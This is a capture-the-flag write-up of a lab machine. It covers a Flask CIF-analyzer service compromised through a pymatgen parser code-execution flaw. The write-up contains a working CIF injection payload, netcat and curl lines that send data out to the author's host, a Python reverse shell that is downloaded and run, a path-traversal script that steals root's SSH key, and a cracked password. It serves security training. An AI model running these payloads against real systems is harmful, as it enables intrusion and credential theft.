Chemistry

INTRODUCTION

Chemistry was released as the penultimate box of HTB’s season 6, Heist. It’s about breaking into a custom service for analyzing a scientific data file. Maybe you’ve seen tools like this before, where some expert in a non-tech field knows just enough coding to solve a problem for themselves? It’s admirable that people do this type of thing, but these tools are often doomed by poor security - as we’ll see in this box.

Foothold is 99% of Chemistry. Unless you’re incredibly clever, it requires a little bit of research to discover a particular vulnerability disclosure, and utilize the PoC that the disclosure provides. The exploit from the PoC is quite limited, however, and will require careful usage to actually gain us a shell. Thankfully, if you build up to your foothold in a series of small steps, it should be relatively easy.

Unlike many “Easy” boxes, there is actually a small escalation from the service account that you use for foothold, to a low-privilege human user. Some very simple local enumeration will uncover a database, and inside are hashes that are trivial to crack - one of them leads to the next user

Privilege escalation to root is… almost not even worth mentioning 😂 Just look through the filesystem for a suspicious script and run it.

title picture

RECON

nmap scans

Port scan

For this box, I’m running my typical enumeration strategy. I set up a directory for the box, with a nmap subdirectory. Then set $RADDR to the target machine’s IP, and scanned it with a simple but broad port scan:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

No web server, eh? That’s interesting!

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Thu, 24 Oct 2024 04:38:29 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>

Vuln scan

Now that we know what services might be running, I’ll do a vulnerability scan:

sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR

No additional info from the vuln scan

UDP scan

To be thorough, I also did a scan over the common UDP ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No results from the UDP scan

Webserver Strategy

Nmap didn’t show any redirect for port 5000, but for convenience I’ll add an entry /etc/hosts and do banner grabbing on that domain:

DOMAIN=chemistry.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
whatweb --aggression 3 http://$DOMAIN:5000 && curl -IL http://$RADDR:5000

whatweb

That’s a slightly old version of Python, but a current version of Werkzeug.

Next I’ll perform vhost and subdomain enumeration. First, I’ll check for alternate hosts:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v

None were found. But frankly, we weren’t expecting any against a Python + Werkzeug ( + Flask probably) webserver; they don’t usually define vhosts.

Next I’ll check for subdomains of chemistry.htb:

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v

No new results from that. I’ll move on to directory enumeration on http://chemistry.htb:5000.

First, directory enumeration:

I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.

WLIST=/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
ffuf -w $WLIST:FUZZ -u http://$DOMAIN:5000/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4

directory enum 1

Uzing ZAP to quickly spider the site, we achieve results that also indicate the POST parameters:

zap spider

Exploring the Website

The landing page is very simple, allowing us only to register or login. After a login, we should be redirected to the Dashboard

index page

To try it out, I’ll register a user:

register and login

The Dashboard allows us to upload .CIF files. Thankfully, they provide an example file at /static/example.cif:

Dashboard

Downloading the example file, we can see that it’s there’s basically no file metadata, just some stuff that probably gets parsed in Python. Notably, they’re using a custom Content-Type header:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.3 Python/3.9.5
Date: Thu, 24 Oct 2024 05:43:11 GMT
Content-Disposition: inline; filename=example.cif
Content-Type: chemical/x-cif
Content-Length: 376
Last-Modified: Wed, 09 Oct 2024 20:13:53 GMT
Cache-Control: no-cache
ETag: "1728504833.9929953-376-2511866491"
Date: Thu, 24 Oct 2024 05:43:11 GMT
Connection: close

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

After uploading the example.cif file, we can see an entry on the dashboard. It has uploaded to a file with a random filename, but the entry on the dashboard shows the filename we provided:

uploaded example

When we view the structure from example.cif that we just uploaded, we can see a couple of calculated values, volume and density. It’s probably a fair assumption that volume is simply a * b * c, but density looks more complicated:

viewing example

☝️ Regardless of how they’re calculated, what’s important is that we have calculated values that are being rendered based on user-controllable inputs.

So far, I see a few things we might be able to attack:

  • The filename. We might be able to do a stored XSS via this parameter, but it’s unclear if that would gain us anything.
  • The calculated values Volume and Density: maybe we can find a way to sneak code into one of the user-controllable parameters, and gain RCE this way?

FOOTHOLD

Playing with the CIF File

At first, I tried to execute python code written into the variables of the CIF file. I placed simple statements into all kinds of different positions of the CIF file, very similar to how you’d test for SSTI…

My only findings were that I could use arbitrary text for the elements in the _atom_site_occupancy data, and that portions of the string would be reflected onto the page. We can change the dimensions of the crystal, but can’t seem to inject commands into those values.

In hopes of traversing the imported modules within the server’s python instance, I tried these payloads in various positions, too. If any of these were successful, we could build somewhat of a “gadget chain” in hopes of accessing something useful like os or subprocess:

  • [].class.base.subclasses()
  • ''.class.mro()[1].subclasses()
  • ''.__class__.__mro__[2].__subclasses__()
  • self.__init__.__globals__.__builtins__

No luck with any of those!

Vulnerability Research

🔍 Since my attempts at injecting code into the CIF file were unsuccessful, I started some web searching for known vulnerabilities in this file format. Eventually, I found this security advisory in the https://github.com/materialsproject/pymatgen Github repo, which documents a PoC for exploiting the parser for this file format:

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

The PoC executes a simple touch pwned command.

Testing the PoC

Clearly, this is a blind attack - there is no reflected info to the website. Therefore, to test if it works, I’ll use a payload that doesn’t rely on reflected values:

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("sleep 3");0,0,0'

I also did this with sleep 1, uploading two files.

It seems like, when I View each of the files, the sleep command actually executes. Here are the two requests to view each file:

sleep poc

We can see that they take 0.19s plus whatever sleep delay was added!

Extend the PoC

Since this foothold will be blind, it might be useful to know whether or not cURL is on the target. Let’s check, using this payload:

I started up an instance of my typical HTTP server on port 8000. Check it out at my github repo if you want to use it too. I’m using it here because it’ll automatically convert base64 data, and because it lives after more than one connection.

I’ve also opened up port 8000 using ufw.

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://10.10.14.17:8000/success");0,0,0'

curl is present

I was having a lot of trouble getting any subshells to work within the payload, so I checked what was available using which combined with nc:

which nc curl wget base64 sh bash ash python python3 | nc 10.10.14.17 53

revshell attempts which

Aha! So base64 and bash are not even on the target. That explains the failure of several of my attempts to exfiltrate any data…

Regardless, I’m not having any luck at all forming a reverse shell. Maybe I’ll try to learn more about the target, using this nc channel that has proven reliable.

Let’s do some basic enumeration:

id | nc 10.10.14.17 53
# uid=1001(app) gid=1001(app) groups=1001(app)

⚠️ Through a little bit of testing, I’m finding that it doesn’t work with subshells. Pipes seem to work perfectly fine though.

Alright, that makes sense. Let’s see if we can read env as a file:

nc 10.10.14.17 53 < /proc/self/env
# LANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binHOME=/home/appLOGNAME=appUSER=appSHELL=/bin/bashINVOCATION_ID=24986dcd0cb74fbdbd9049da93c48384JOURNAL_STREAM=9:38060WERKZEUG_SERVER_FD=4

Ohh interesting - this user has a home directory. Let’s list the contents:

ls -laR /home/app nc 10.10.14.17 53

This produced a lot of results, but here are the notable parts:

home directory enum 0

home directory enum

home directory enum 2

USER FLAG

Planting an SSH Key

🚫 This didn’t actually work. I’m still not quite sure why. If you’re short on time, skip ahead to the next section.

Since we know the app user has a home directory, maybe we can simply plant an SSH key to get a shell? First, I’ll need to generate a keypair:

ssh-keygen -t rsa -b 4096 -f app_id_rsa -N "p3lican"
cp app_id_rsa.pub ../www  # Copy the pubkey over to the directory our http server is serving

Now let’s attempt to make an SSH directory and plant the pubkey. Here are the payloads:

mkdir /home/app/.ssh
curl http://10.10.14.17:8000/app_id_rsa.pub -o /home/app/.ssh/id_rsa.pub

I ran an extra payload to check that the pubkey landed where it should have (it did), so now we’re ready to connect over SSH:

ssh -i ./app_id_rsa app@$RADDR

ssh didnt work

Huh? Why isn’t it accepting key-based authentication? Is it explicitly disabled or something? The permissions on both files of the keypair are correct.

Oh well, may as well try something else… 😔

Python Reverse Shell

Since we’ve already demonstrated we can write files using cURL, and that python3 is present on the target, why not simply download a python script and run it as a reverse shell?

My attempts to form a python reverse shell didn’t work (using the payload from earlier). But those attempts were subject to whatever limitations the exploit had - and we already know that it didn’t accomodate subshells. Maybe we’ll have better luck running the reverse shell as a script?

First, I’ll prepare revshell.py in my www directory, the directory that my http server is serving:

#!/usr/bin/python3

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.17",53))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("sh")

Next I’ll start up a reverse shell listener:

sudo ufw allow from $RADDR to any port 53 proto tcp
bash
sudo su
rlwrap nc -lvnp 53

Now I’ll prepare another two .cif files - one with a payload to download the reverse shell, and another with a payload to run it:

curl http://10.10.14.17:8000/revshell.py -o /home/app/revshell.py
python3 /home/app/revshell.py

scripts for python revshell

Running both of those, we finally see a reverse shell open:

revshell open

database.db

Now that we have a stable reverse shell, and don’t need to worry about the limitations of the exploit, let’s exfil that database we found:

uploaded database

Now, from the attacker host, we can open it up and see what we’ve found:

SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE structure (
        id INTEGER NOT NULL,
        user_id INTEGER NOT NULL,
        filename VARCHAR(150) NOT NULL,
        identifier VARCHAR(100) NOT NULL,
        PRIMARY KEY (id),
        FOREIGN KEY(user_id) REFERENCES user (id),
        UNIQUE (identifier)
);
CREATE TABLE user (
        id INTEGER NOT NULL,
        username VARCHAR(150) NOT NULL,
        password VARCHAR(150) NOT NULL,
        PRIMARY KEY (id),
        UNIQUE (username)
);

The user table looks like it has password hashes. I’ll put them in a nice format and extract them:

.mode csv
.separator :
select username,password from user;

user hashes

Lucky us - those look like MD5 hashes! They should be trivial to crack 👍

The list of users also contains rosa, who is the other user with a home directory on this box.

Password Cracking

I’ve copy-pasted those hashes (with the usernames) into database.hash. Under the assumption that they’re regular MD5 hashes, I’ll run hashcat over them:

hashcat -m 0 --username database.hash /usr/share/wordlists/rockyou.txt

Seconds later, we have several results - including rosa:

cracked hashes

The important credential is rosa : unicorniorosados. With any luck, this password will have been re-used for the local rosa account:

ssh rosa@$RADDR  # unicorniorosados

ssh as rosa

Excellent - we now have an SSH connection as rosa. The user flag is in /home/rosa, so go read it for some points:

cat /home/rosa/user.txt

ROOT FLAG

Local Enumeration - rosa

A quick check to netstat shows there is another listening process, listening locally on port 8080:

netstat

Cross-referencing this with ps aux, we can be reasonably sure that this is the process running from /opt/monitoring_site/app.py:

ps monitoring app

root is running the server, and only root can access that directory. Let’s forward the port and check it out.

Since I already have an SSH connection, the easiest way to forward the port is simply using SSH -L

ssh -L 8080:localhost:8080 rosa@$RADDR

Now we should be able to access that port on localhost:

monitoring_site

Monitoring Site

🚫 This section didn’t lead towards privilege escalation. If you’re short on time, skip to the next section.

Checking out the site

The monitoring site looks like it was made quite hastily, possibly hinting that this is something we should attack? The Start Service, Stop Service, and Check Attacks buttons in the navbar seem like they’re unimplemented - clicking any of them shows a message that the feature is not available.

The graphs on the Home page are completely static, so the only functionality that is actually implemented here is under List Services. Here’s the javascript connected to that button:

$('#list-services').click(function() {
    $('.container > div').hide();
    $('#service-list').show();
    $('#attack-logs').hide();

    // Get list of services
    $('.loader').show();
    $.get('/list_services', function(data) {
        $('.loader').hide();
        var runningServices = [];
        var stoppedServices = [];

        // Separate running and stopped services
        // ...
        
        // Show running services
        // ...

        // Show stopped services
        // ...
    });
});

In short, it makes GET request to /list_services, then parses the results. Here’s what that endpoint looks like:

list_services

That’s interesting, but I don’t really see anything out of the ordinary.

Enumerating the API

Since there are unimplemented features in the frontend, there’s a possibility that the developer created the backend first and just hasn’t got around to finishing the frontend. We already know about GET /list_services; are there more?

Thankfully, Seclists has a good wordlist for enumerating APIs:

WLIST=/usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -t 60 -ic -c -timeout 4 -mc all -fc 404

API enum get

ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -X POST -t 60 -ic -c -timeout 4 -mc all -fc 404

API enum post

There weren’t any significant results. If I get stuck, I might return to enumerating the API more - for now, I’ll move on to something else.

Continuing local enumeration

As I was downloading my toolbox into /tmp (to get a copy of pspy), I noticed something very odd sitting there:

found prewritten exploit

The contents of expl.sh:

#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa" # without the first /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done

😏 Rosa… what have you been up to?

The above script is a pre-written exploit for the monitoring_site server. It applies a very simple path traversal to obtain the id_rsa key for root.

So what are we waiting for? Let’s run it!

prewritten exploit success

😂 Yep, that’s right - rosa has been doing their own privesc work. Lucky us, eh? The script works flawlessly and dumps the SSH private key for root.

All we need to do is paste it into a file and fix the permissions on it:

vim loot/root_id_rsa  # [paste the key]
chmod 600 loot/root_id_rsa
ssh -i loot/root_id_rsa root@$RADDR

root  ssh

cat /root/root.txt

Wow - privesc was ridiculously easy!

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.Tools:

rm -rf /tmp/.Tools

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

rm loot/database.db

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

LESSONS LEARNED

two crossed swords

Attacker

  • 🗺️ Don’t get too fixated on a certain route to RCE. On this box, I feel like I wasted a lot of time during foothold trying to test and understand the limitations of the CIF file exploit. If I could go back and do it again, I would have adjusted my approach as soon as I found a single working command like nc.

  • 👣 Related to the above point, break your ideas up into small, testable steps. In the end, it will save a lot of time because you won’t be checking and re-checking your assumptions over and over. Form a hypothesis, figure out a way to test it, prove it to yourself, then add it to your big bag of knowledge and keep moving forward.

two crossed swords

Defender

  • 💉 Beware niche libraries that might not practice secure coding. I’m sure the creators of the .CIF file interaction libraries were exceptionally good scientists, but nobody is an expert in everything… They followed very sloppy coding practices, using an eval() call to parse user-controllable inputs, leading to our ability to inject commands. The lesson here is mostly to monitor the health of open-source projects: for maximum security, we need active contribution from a good balance between people, of a wide variety of skillsets.

  • #️⃣ Hash passwords properly. Give some consideration to password hashing. In the end, the best password hashing balances the ease of legitimate password verification and difficulty of illicit password cracking. This box used unsalted MD5 for hashing passwords, which is laughably easy to crack (you can even just toss them into Crackstation.net). Better modern approaches would have been using bcrypt (with sufficient difficulty), or using **PBKDF2 with HMAC-SHA-512 **(also with sufficient difficulty). Check out the guidlines by OWASP for more info.

  • Permissions are only as useful as the most permissive thing a service has access to. On this box, we escalated privilege by using a very simple path traversal - so why was the monitoring_site able to access root’s SSH key? This server should have been run as a service account, with limited permissions. Heck, even rosa had sufficient permissions to list the running services (service --status-all), so why was it granted root?


Thanks for reading

🤝🤝🤝🤝
@4wayhandshake